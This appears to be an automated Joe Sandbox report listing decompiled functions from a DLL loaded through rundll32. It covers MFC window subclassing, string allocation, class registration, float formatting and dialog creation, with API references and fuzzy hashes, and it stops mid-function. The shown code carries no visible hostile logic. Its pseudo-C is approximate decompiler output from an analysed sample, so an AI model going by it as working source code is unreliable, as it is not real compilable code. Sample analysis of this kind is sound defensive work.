Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$EnumShowWindowWindows
String ID: Class Name$Handle$Position$Size$Title$Visible
API String ID: 2835337212-1044999955
Opcode ID: 234e9427408f03d077dc5a09339208828af23a2054dd4e41a140069fdd4963f0
Instruction ID: 5b3f4c06643dc47a5fad6414e9e2523a50f5fe302b23b9255f75891dd828c4ce
Opcode Fuzzy Hash: 234e9427408f03d077dc5a09339208828af23a2054dd4e41a140069fdd4963f0
Instruction Fuzzy Hash: 0D313C35A44B00ABE224EB74DC4AFA7B2E5FB84710F54460DB366AE5E1CFB0B5058B52

Uniqueness

Uniqueness Score: -1.00%

Function 10021A08 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E10021A08(void* __ecx, void* __edx) {
				_Unknown_base(*)()* _t33;
				void* _t35;
				void* _t36;
				void* _t41;
				void* _t44;
				long _t54;
				signed int _t59;
				void* _t62;
				void* _t67;
				struct HWND__* _t69;
				CHAR* _t72;
				void* _t75;
				void* _t76;
				void* _t78;

				_t67 = __edx;
				_t62 = __ecx;
				E10011A8C(E1002A947, _t76);
				_t69 =  *(_t76 + 8);
				 *((intOrPtr*)(_t76 - 0x10)) = _t78 - 0x40;
				_t72 = "AfxOldWndProc423";
				_t33 = GetPropA(_t69, _t72);
				 *(_t76 - 0x14) =  *(_t76 - 0x14) & 0x00000000;
				 *(_t76 - 4) =  *(_t76 - 4) & 0x00000000;
				 *(_t76 - 0x18) = _t33;
				_t59 = 1;
				_t35 =  *(_t76 + 0xc) - 6;
				if(_t35 == 0) {
					_t36 = E10020A8C(_t76,  *(_t76 + 0x14));
					E10021931(_t62, E10020A8C(_t76, _t69),  *(_t76 + 0x10), _t36);
					goto L9;
				} else {
					_t41 = _t35 - 0x1a;
					if(_t41 == 0) {
						_t59 = 0 | E10021992(E10020A8C(_t76, _t69),  *(_t76 + 0x14),  *(_t76 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t59 != 0) {
							goto L10;
						}
					} else {
						_t44 = _t41 - 0x62;
						if(_t44 == 0) {
							SetWindowLongA(_t69, 0xfffffffc,  *(_t76 - 0x18));
							RemovePropA(_t69, _t72);
							GlobalDeleteAtom(GlobalFindAtomA(_t72));
							goto L10;
						} else {
							if(_t44 != 0x8e) {
								L10:
								 *(_t76 - 0x14) = CallWindowProcA( *(_t76 - 0x18), _t69,  *(_t76 + 0xc),  *(_t76 + 0x10),  *(_t76 + 0x14));
							} else {
								_t75 = E10020A8C(_t76, _t69);
								E100200C8(_t75, _t76 - 0x30, _t76 - 0x1c);
								_t54 = CallWindowProcA( *(_t76 - 0x18), _t69, 0x110,  *(_t76 + 0x10),  *(_t76 + 0x14));
								_push( *((intOrPtr*)(_t76 - 0x1c)));
								 *(_t76 - 0x14) = _t54;
								_push(_t76 - 0x30);
								_push(_t75);
								E10020FD8(_t67);
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return  *(_t76 - 0x14);
			}

APIs

__EH_prolog.LIBCMT ref: 10021A0D
GetPropA.USER32 ref: 10021A25
CallWindowProcA.USER32 ref: 10021A83

Part of subcall function 10020FD8: GetWindowRect.USER32 ref: 10020FFD
Part of subcall function 10020FD8: GetWindow.USER32(?,00000004), ref: 1002101A

SetWindowLongA.USER32 ref: 10021AB3
RemovePropA.USER32 ref: 10021ABB
GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 10021AC2
GlobalDeleteAtom.KERNEL32(00000000), ref: 10021AC9

Part of subcall function 100200C8: GetWindowRect.USER32 ref: 100200D4

CallWindowProcA.USER32 ref: 10021B1D

Strings

AfxOldWndProc423, xrefs: 10021A1E, 10021A23, 10021AB9, 10021AC1

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
String ID: AfxOldWndProc423
API String ID: 2397448395-1060338832
Opcode ID: 5b6e10a8791aa71462b777079064f57030f775fcf92d7cd70ed55ef028a2e836
Instruction ID: f4db88134fa4fcd45b9ca341be74c52e6f6026fe64d5eaacddb05769ed1f3ebd
Opcode Fuzzy Hash: 5b6e10a8791aa71462b777079064f57030f775fcf92d7cd70ed55ef028a2e836
Instruction Fuzzy Hash: 1931903680121ABBDB02DFA4ED89DFF7FB9EF09351F400119F901A2151D7359A11DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 10029C82 Relevance: 15.2, APIs: 10, Instructions: 181
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E10029C82(void* __ecx) {
				intOrPtr _t52;
				intOrPtr _t53;
				void* _t57;
				CHAR* _t60;
				CHAR* _t88;
				CHAR* _t89;
				void* _t102;
				CHAR* _t103;
				CHAR* _t105;
				CHAR* _t106;
				CHAR* _t107;
				void* _t111;
				short* _t112;
				void* _t122;
				void* _t127;
				void* _t129;
				void* _t131;

				_t127 = _t129 - 0x8c;
				_t52 =  *0x100371f4; // 0x82d1d2ba
				 *((intOrPtr*)(_t127 + 0x88)) = _t52;
				_t53 =  *0x10036148(_t111, _t122, _t102);
				_t112 =  *((intOrPtr*)(_t127 + 0x94));
				 *((intOrPtr*)(_t127 - 0x7c)) = _t53;
				E10012400(_t112, 0, 0x20);
				_t103 =  *(_t127 + 0x98);
				_t131 = _t129 - 0x10c + 0xc;
				_t109 = _t103;
				 *(_t127 - 0x80) = _t127 - 0x78;
				if(E100231B4(_t103, 0x1002de8c) == 0) {
					_t109 = _t103;
					_t57 = E100231B4(_t103, 0x1002d4b0);
					_push(0x100);
					_push(_t127 - 0x78);
					if(_t57 == 0) {
						_push(0xf108);
						E10023367();
						 *_t112 = 0xf108;
						L12:
						_t60 = 0;
						if( *(_t127 - 0x80) == 0) {
							L14:
							__imp__#2(_t60);
							 *(_t112 + 8) = _t60;
							if( *(_t112 + 4) == 0) {
								_t106 =  *(E10027747() + 0x10);
								if(_t106 != 0) {
									_t115 = lstrlenA(_t106) + 1;
									E100116D0(lstrlenA(_t106) + 0x00000001 + lstrlenA(_t106) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
									_t60 = E10008BC0(_t131, _t106, _t115,  *((intOrPtr*)(_t127 - 0x7c)));
									_t112 =  *((intOrPtr*)(_t127 + 0x94));
								} else {
									_t60 = 0;
								}
								__imp__#2(_t60);
								 *(_t112 + 4) = _t60;
							}
							if( *(_t112 + 0xc) == 0 &&  *(_t112 + 0x10) != 0) {
								_t105 =  *( *((intOrPtr*)(E10027747() + 4)) + 0x60);
								if(_t105 != 0) {
									_t126 = lstrlenA(_t105) + 1;
									E100116D0(lstrlenA(_t105) + 0x00000001 + lstrlenA(_t105) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
									_t60 = E10008BC0(_t131, _t105, _t126,  *((intOrPtr*)(_t127 - 0x7c)));
								} else {
									_t60 = 0;
								}
								__imp__#2(_t60);
								 *(_t112 + 0xc) = _t60;
							}
							return E10011A49(_t60,  *((intOrPtr*)(_t127 + 0x88)));
						}
						L13:
						_t117 = lstrlenA( *(_t127 - 0x80)) + 1;
						E100116D0(lstrlenA( *(_t127 - 0x80)) + 0x00000001 + lstrlenA( *(_t127 - 0x80)) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
						_t60 = E10008BC0(_t131,  *(_t127 - 0x80), _t117,  *((intOrPtr*)(_t127 - 0x7c)));
						_t112 =  *((intOrPtr*)(_t127 + 0x94));
						goto L14;
					}
					_push(0xf10a);
					E10023367();
					 *_t112 = 0xf10a;
					goto L13;
				}
				 *(_t127 - 0x80) = _t103[0xc];
				 *_t112 = _t103[8];
				 *(_t112 + 0x10) = _t103[0x10];
				 *(_t112 + 0x1c) = _t103[0x1c];
				_t88 = _t103[0x14];
				 *(_t127 + 0x98) = _t88;
				if( *((intOrPtr*)(_t88 - 0xc)) != 0) {
					if(_t88 != 0) {
						_t121 = lstrlenA(_t88) + 1;
						E100116D0(lstrlenA(_t88) + 0x00000001 + lstrlenA(_t88) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
						_t88 = E10008BC0(_t131,  *(_t127 + 0x98), _t121,  *((intOrPtr*)(_t127 - 0x7c)));
						_t112 =  *((intOrPtr*)(_t127 + 0x94));
					}
					__imp__#2(_t88);
					 *(_t112 + 0xc) = _t88;
				}
				_t107 = _t103[0x18];
				_t89 = 0;
				if( *((intOrPtr*)(_t107 - 0xc)) != 0) {
					if(_t107 != 0) {
						_t119 = lstrlenA(_t107) + 1;
						E100116D0(lstrlenA(_t107) + 0x00000001 + lstrlenA(_t107) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
						_t89 = E10008BC0(_t131, _t107, _t119,  *((intOrPtr*)(_t127 - 0x7c)));
						_t112 =  *((intOrPtr*)(_t127 + 0x94));
					}
					__imp__#2(_t89);
					 *(_t112 + 4) = _t89;
				}
				goto L12;
			}

APIs

lstrlenA.KERNEL32(?,1002DE8C), ref: 10029D0D

Part of subcall function 10008BC0: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,?,?), ref: 10008BE2

SysAllocString.OLEAUT32(?), ref: 10029D39
lstrlenA.KERNEL32(?,1002DE8C), ref: 10029D51
SysAllocString.OLEAUT32(00000000), ref: 10029D78
lstrlenA.KERNEL32(?,0000F108,?,00000100,1002D4B0,1002DE8C), ref: 10029DC6
SysAllocString.OLEAUT32(00000000), ref: 10029DEF
lstrlenA.KERNEL32(?), ref: 10029E0F
SysAllocString.OLEAUT32(00000000), ref: 10029E36
lstrlenA.KERNEL32(?), ref: 10029E5F
SysAllocString.OLEAUT32(00000000), ref: 10029E80

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AllocStringlstrlen$ByteCharMultiWide
String ID:
API String ID: 2903237683-0
Opcode ID: de0bc46a09759d7d8f8fb8757648b13e3c5e195ba7c08ba692528cbbc1d75815
Instruction ID: c648e2966158b214d9de0f6ce91c9bd8f183a0581763daa94d68119b085db595
Opcode Fuzzy Hash: de0bc46a09759d7d8f8fb8757648b13e3c5e195ba7c08ba692528cbbc1d75815
Instruction Fuzzy Hash: 7451B376900609EBDB20EFB5DC85B8AB7B8FF04394F518526E914CB241DB74E951CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001F70B Relevance: 15.1, APIs: 10, Instructions: 81
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001F70B() {
				signed int _t39;
				CHAR* _t43;
				int _t44;
				WNDCLASSA* _t63;
				void* _t71;
				void* _t73;

				E10011A8C(E1002A8B4, _t71);
				_t63 =  *(_t71 + 8);
				 *((intOrPtr*)(_t71 - 0x10)) = _t73 - 0x38;
				if(GetClassInfoA(_t63->hInstance, _t63->lpszClassName, _t71 - 0x40) == 0) {
					if(RegisterClassA(_t63) == 0) {
						L5:
						_t39 = 0;
					} else {
						 *(_t71 - 0x18) = 1;
						if( *((char*)(E10027747() + 0x14)) == 0) {
							L10:
							_t39 =  *(_t71 - 0x18);
						} else {
							E100286A3(1);
							 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
							_t43 = E10027747() + 0x34;
							 *(_t71 - 0x14) = _t43;
							_t44 = lstrlenA(_t43);
							_t13 = lstrlenA(_t63->lpszClassName) + 2; // 0x2
							if(_t44 + _t13 < 0x1000) {
								 *(_t71 + 8) = lstrlenA( *(_t71 - 0x14));
								_t19 = lstrlenA(_t63->lpszClassName) + 2; // 0x6
								if( *(_t71 + 8) + _t19 >= 0x1000) {
									 *(_t71 - 0x18) =  *(_t71 - 0x18) & 0x00000000;
									UnregisterClassA(_t63->lpszClassName, _t63->hInstance);
								} else {
									lstrcatA( *(_t71 - 0x14), _t63->lpszClassName);
									 *(_t71 + 0xa) = 0xa;
									 *((char*)(_t71 + 0xb)) = 0;
									lstrcatA( *(_t71 - 0x14), _t71 + 0xa);
								}
								 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
								E10028706(1);
								goto L10;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t39 = 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t71 - 0xc));
				return _t39;
			}

APIs

__EH_prolog.LIBCMT ref: 1001F710
GetClassInfoA.USER32 ref: 1001F72B
RegisterClassA.USER32 ref: 1001F73E
lstrlenA.KERNEL32(-00000034,00000001), ref: 1001F77A
lstrlenA.KERNEL32(?), ref: 1001F781

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Classlstrlen$H_prologInfoRegister
String ID:
API String ID: 3690589370-0
Opcode ID: 46f7db560ba77d1aac1329791f988d3da41fd5ea00b2b9b1c15773706d036c42
Instruction ID: eb128248469e04ddba19681c4089172a10975becbb5dbf1d992d7842769f5dc7
Opcode Fuzzy Hash: 46f7db560ba77d1aac1329791f988d3da41fd5ea00b2b9b1c15773706d036c42
Instruction Fuzzy Hash: 4831CE3590821AAFDB01DFA0CD85AAEBFF4FF04354F10401AE805A65A1C770EA51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001BFCE Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 228
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E1001BFCE(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed short* _a24) {
				intOrPtr _v8;
				char _v9;
				signed int _v10;
				signed int _v14;
				signed int _v18;
				signed short _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v44;
				signed int _v48;
				signed short* _v52;
				intOrPtr _t87;
				signed int _t88;
				signed short* _t99;
				intOrPtr* _t100;
				signed int _t101;
				signed short _t103;
				signed int _t105;
				signed short* _t131;
				signed int _t133;
				signed int _t139;
				signed short* _t141;
				signed short _t149;
				signed int _t151;
				signed int _t152;
				signed int _t159;
				signed int _t161;
				signed int _t164;
				void* _t165;
				void* _t166;

				_t87 =  *0x100371f4; // 0x82d1d2ba
				_v8 = _t87;
				_t88 = _a12;
				_t131 = _a24;
				_t133 = _t88 & 0x00008000;
				_v32 = 0xcc;
				_v31 = 0xcc;
				_v30 = 0xcc;
				_v29 = 0xcc;
				_v28 = 0xcc;
				_v27 = 0xcc;
				_v26 = 0xcc;
				_v25 = 0xcc;
				_v24 = 0xcc;
				_v23 = 0xcc;
				_v22 = 0xfb;
				_v21 = 0x3f;
				_v48 = 1;
				_t149 = _t88 & 0x00007fff;
				if(_t133 == 0) {
					_t131[1] = 0x20;
				} else {
					_t131[1] = 0x2d;
				}
				_t151 = _a8;
				if(_t149 != 0 || _t151 != 0 || _a4 != _t151) {
					if(_t149 != 0x7fff) {
						_t90 = _t149 & 0x0000ffff;
						_v20 = _v20 & 0x00000000;
						_v18 = _a4;
						_t159 = (((_t149 & 0x0000ffff) >> 8) + (_t151 >> 0x18) * 2) * 0x4d + _t90 * 0x4d10 - 0x134312f4 >> 0x10;
						_v10 = _t149;
						_v14 = _t151;
						E1001C71C(_t131, _t151, _t159,  &_v20,  ~_t159, 1);
						_t166 = _t165 + 0xc;
						__eflags = _v10 - 0x3fff;
						if(_v10 >= 0x3fff) {
							_t159 = _t159 + 1;
							__eflags = _t159;
							E1001C4EA(_t131, _t151, _t159,  &_v20,  &_v32);
						}
						__eflags = _a20 & 0x00000001;
						_t152 = _a16;
						 *_t131 = _t159;
						if((_a20 & 0x00000001) == 0) {
							L27:
							__eflags = _t152 - 0x15;
							if(_t152 > 0x15) {
								_t152 = 0x15;
							}
							_t161 = (_v10 & 0x0000ffff) - 0x3ffe;
							_t52 =  &_v10;
							 *_t52 = _v10 & 0x00000000;
							__eflags =  *_t52;
							_a12 = 8;
							do {
								E1001BA61( &_v20);
								_t56 =  &_a12;
								 *_t56 = _a12 - 1;
								__eflags =  *_t56;
							} while ( *_t56 != 0);
							__eflags = _t161;
							if(_t161 < 0) {
								_t164 =  ~_t161 & 0x000000ff;
								__eflags = _t164;
								if(_t164 > 0) {
									do {
										E1001BA8F( &_v20);
										_t164 = _t164 - 1;
										__eflags = _t164;
									} while (_t164 != 0);
								}
							}
							_t59 = _t152 + 1; // 0xcd
							_t139 = _t59;
							__eflags = _t139;
							_t99 =  &(_t131[2]);
							_v52 = _t99;
							if(_t139 > 0) {
								_a12 = _t139;
								do {
									asm("movsd");
									asm("movsd");
									asm("movsd");
									E1001BA61( &_v20);
									E1001BA61( &_v20);
									E1001BA03(__eflags,  &_v20,  &_v44);
									E1001BA61( &_v20);
									_t166 = _t166 + 0x14;
									_v52 =  &(_v52[0]);
									_t74 =  &_a12;
									 *_t74 = _a12 - 1;
									__eflags =  *_t74;
									 *_v52 = _v9 + 0x30;
									_v9 = 0;
								} while ( *_t74 != 0);
								_t99 = _v52;
							}
							_t100 = _t99 - 1;
							_t101 = _t100 - 1;
							__eflags =  *_t100 - 0x35;
							_t141 =  &(_t131[2]);
							if( *_t100 < 0x35) {
								while(1) {
									__eflags = _t101 - _t141;
									if(_t101 < _t141) {
										break;
									}
									__eflags =  *_t101 - 0x30;
									if( *_t101 == 0x30) {
										_t101 = _t101 - 1;
										__eflags = _t101;
										continue;
									}
									break;
								}
								__eflags = _t101 - _t141;
								if(_t101 >= _t141) {
									goto L46;
								} else {
									 *_t141 = 0x30;
									goto L54;
								}
							} else {
								while(1) {
									__eflags = _t101 - _t141;
									if(_t101 < _t141) {
										break;
									}
									__eflags =  *_t101 - 0x39;
									if( *_t101 == 0x39) {
										 *_t101 = 0x30;
										_t101 = _t101 - 1;
										__eflags = _t101;
										continue;
									}
									break;
								}
								__eflags = _t101 - _t141;
								if(_t101 < _t141) {
									_t101 = _t101 + 1;
									 *_t131 =  *_t131 + 1;
									__eflags =  *_t131;
								}
								 *_t101 =  *_t101 + 1;
								__eflags =  *_t101;
								L46:
								_t103 = _t101 - _t131 - 3;
								__eflags = _t103;
								_t131[1] = _t103;
								 *((char*)( &(_t131[2]) + _t103)) = 0;
								goto L47;
							}
						} else {
							_t152 = _t152 + _t159;
							__eflags = _t152;
							if(_t152 > 0) {
								goto L27;
							} else {
								goto L26;
							}
						}
					} else {
						 *_t131 = 1;
						if(_t151 != 0x80000000 || _a4 != 0) {
							if((_t151 & 0x40000000) != 0) {
								goto L11;
							} else {
								_push("1#SNAN");
								goto L21;
							}
						} else {
							L11:
							__eflags = _t133;
							if(_t133 == 0) {
								L15:
								__eflags = _t151 - 0x80000000;
								if(_t151 != 0x80000000) {
									goto L20;
								} else {
									__eflags = _a4;
									if(_a4 != 0) {
										goto L20;
									} else {
										_push("1#INF");
										goto L18;
									}
								}
							} else {
								__eflags = _t151 - 0xc0000000;
								if(_t151 != 0xc0000000) {
									goto L15;
								} else {
									__eflags = _a4;
									if(_a4 != 0) {
										L20:
										_push("1#QNAN");
										L21:
										_push( &(_t131[2]));
										E10018100();
										_t131[1] = 6;
									} else {
										_push("1#IND");
										L18:
										_push( &(_t131[2]));
										E10018100();
										_t131[1] = 5;
									}
								}
							}
						}
						_v48 = _v48 & 0x00000000;
						L47:
						_t105 = _v48;
					}
				} else {
					L26:
					_t131[2] = 0x30;
					L54:
					 *_t131 =  *_t131 & 0x00000000;
					_t131[1] = 0x20;
					_t131[1] = 1;
					_t131[2] = 0;
					_t105 = 1;
				}
				return E10011A49(_t105, _v8);
			}

APIs

_strcat.LIBCMT ref: 1001C0A6
_strcat.LIBCMT ref: 1001C0C3
___shr_12.LIBCMT ref: 1001C18C

Strings

1#SNAN, xrefs: 1001C072
1#QNAN, xrefs: 1001C0BA
1#INF, xrefs: 1001C09D
1#IND, xrefs: 1001C08C
?, xrefs: 1001C023

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _strcat$___shr_12
String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?
API String ID: 1152255961-4131533671
Opcode ID: 3deeed232556c0083d1f5ccfdc9c101b2c61cfa05ef8230ec948a198c5436684
Instruction ID: 46e37a2c643aaa745d1bc51bced561f55ee0e999ab544f85a5308abf98787be4
Opcode Fuzzy Hash: 3deeed232556c0083d1f5ccfdc9c101b2c61cfa05ef8230ec948a198c5436684
Instruction Fuzzy Hash: CC81F4328042DEDEDF12CBA8C845BAE7BF4EF16354F0945AAE850DF182D374D6858762

Uniqueness

Uniqueness Score: -1.00%

Function 1001F0AE Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E1001F0AE(intOrPtr* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t67;
				intOrPtr* _t68;
				signed int _t74;
				signed int _t76;
				struct HWND__* _t77;
				signed int _t80;
				int _t96;
				signed int _t97;
				intOrPtr* _t107;
				signed int _t116;
				signed int _t135;
				DLGTEMPLATE* _t136;
				struct HWND__* _t138;
				void* _t139;
				void* _t141;

				_t109 = __ecx;
				E10011A8C(E1002A804, _t139);
				_t107 = __ecx;
				 *((intOrPtr*)(_t139 - 0x10)) = _t141 - 0x3c;
				 *((intOrPtr*)(_t139 - 0x20)) = __ecx;
				if( *(_t139 + 0x10) == 0) {
					 *(_t139 + 0x10) =  *(E10027747() + 0xc);
				}
				_t135 =  *(E10027747() + 0x1038);
				 *(_t139 - 0x28) = _t135;
				 *(_t139 - 0x14) = 0;
				 *((intOrPtr*)(_t139 - 0x24)) = 0;
				 *(_t139 - 4) = 0;
				E100206E5(_t109, 0x10);
				E100206E5(_t109, 0x7c000);
				if(_t135 == 0) {
					_t136 =  *(_t139 + 8);
					L7:
					__eflags = _t136;
					if(__eflags == 0) {
						L4:
						_t67 = 0;
						L32:
						 *[fs:0x0] =  *((intOrPtr*)(_t139 - 0xc));
						return _t67;
					}
					_t68 = E1002320B();
					_t129 =  *_t68;
					 *((intOrPtr*)(_t139 - 0x1c)) =  *((intOrPtr*)( *_t68 + 0xc))() + 0x10;
					 *(_t139 - 4) = 1;
					 *((intOrPtr*)(_t139 - 0x18)) = 0;
					__eflags = E10024117(__eflags, _t136, _t139 - 0x1c, _t139 - 0x18);
					__eflags =  *0x1003a0e4; // 0x0
					_t74 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						L14:
						__eflags = _t74;
						if(_t74 == 0) {
							L17:
							 *(_t107 + 0x40) =  *(_t107 + 0x40) | 0xffffffff;
							 *(_t107 + 0x38) =  *(_t107 + 0x38) | 0x00000010;
							_push(_t107);
							E10021D7F();
							_t76 =  *(_t139 + 0xc);
							__eflags = _t76;
							if(_t76 != 0) {
								_t77 =  *(_t76 + 0x1c);
							} else {
								_t77 = 0;
							}
							_t138 = CreateDialogIndirectParamA( *(_t139 + 0x10), _t136, _t77, E1001EB48, 0);
							E10002EB0( *((intOrPtr*)(_t139 - 0x1c)) + 0xfffffff0, _t129);
							_t116 =  *(_t139 - 0x28);
							 *(_t139 - 4) =  *(_t139 - 4) | 0xffffffff;
							__eflags = _t116;
							if(_t116 != 0) {
								 *((intOrPtr*)( *_t116 + 0x14))(_t139 - 0x48);
								__eflags = _t138;
								if(_t138 != 0) {
									 *((intOrPtr*)( *_t107 + 0x12c))(0);
								}
							}
							_t80 = E10020B34();
							__eflags = _t80;
							if(_t80 == 0) {
								 *((intOrPtr*)( *_t107 + 0x114))();
							}
							__eflags = _t138;
							if(_t138 != 0) {
								__eflags =  *(_t107 + 0x38) & 0x00000010;
								if(( *(_t107 + 0x38) & 0x00000010) == 0) {
									DestroyWindow(_t138);
									_t138 = 0;
									__eflags = 0;
								}
							}
							__eflags =  *(_t139 - 0x14);
							if( *(_t139 - 0x14) != 0) {
								GlobalUnlock( *(_t139 - 0x14));
								GlobalFree( *(_t139 - 0x14));
							}
							__eflags = _t138;
							_t60 = _t138 != 0;
							__eflags = _t60;
							_t67 = 0 | _t60;
							goto L32;
						}
						L15:
						E100240E8(_t139 - 0x38, _t136);
						 *(_t139 - 4) = 2;
						E1002404A(_t107, _t139 - 0x38, 0, _t136,  *((intOrPtr*)(_t139 - 0x18)));
						 *(_t139 - 0x14) = E10023DFE(_t139 - 0x38);
						 *(_t139 - 4) = 1;
						E10023DF0(_t139 - 0x38);
						__eflags =  *(_t139 - 0x14);
						if( *(_t139 - 0x14) != 0) {
							_t136 = GlobalLock( *(_t139 - 0x14));
						}
						goto L17;
					}
					__eflags = _t74;
					if(_t74 != 0) {
						goto L15;
					}
					_t96 = GetSystemMetrics(0x2a);
					__eflags = _t96;
					if(_t96 == 0) {
						goto L17;
					}
					_t97 = E10012518( *((intOrPtr*)(_t139 - 0x1c)), "MS Shell Dlg");
					asm("sbb al, al");
					_t74 =  ~_t97 + 0x00000001 & 0x000000ff;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L17;
					}
					__eflags =  *((short*)(_t139 - 0x18)) - 8;
					if( *((short*)(_t139 - 0x18)) == 8) {
						 *((intOrPtr*)(_t139 - 0x18)) = 0;
					}
					goto L14;
				}
				_push(_t139 - 0x48);
				if( *((intOrPtr*)( *_t107 + 0x12c))() != 0) {
					_t136 =  *((intOrPtr*)( *_t135 + 0x10))(_t139 - 0x48,  *(_t139 + 8));
					goto L7;
				}
				goto L4;
			}

APIs

__EH_prolog.LIBCMT ref: 1001F0B3
GetSystemMetrics.USER32 ref: 1001F177
GlobalLock.KERNEL32 ref: 1001F1E2
CreateDialogIndirectParamA.USER32(?,?,?,Function_0001EB48,00000000), ref: 1001F211

Strings

MS Shell Dlg, xrefs: 1001F181

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CreateDialogGlobalH_prologIndirectLockMetricsParamSystem
String ID: MS Shell Dlg
API String ID: 2364537584-76309092
Opcode ID: 02ed30a61ad99a6b9c378d6f8cf422091e96cbe3ed39422879770f03b856be4e
Instruction ID: 8445b7602e0903474612167ef95f055d91e510faa3214ef66b7d79f5cf335928
Opcode Fuzzy Hash: 02ed30a61ad99a6b9c378d6f8cf422091e96cbe3ed39422879770f03b856be4e
Instruction Fuzzy Hash: F651CE35900209EFCB11EFA4C8859EEBBB5EF64350F204559F812EB192DB349E85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 10005C90 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 126
windowprocessCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E10005C90(void* __ecx) {
				char _v268;
				void* _v300;
				intOrPtr _v328;
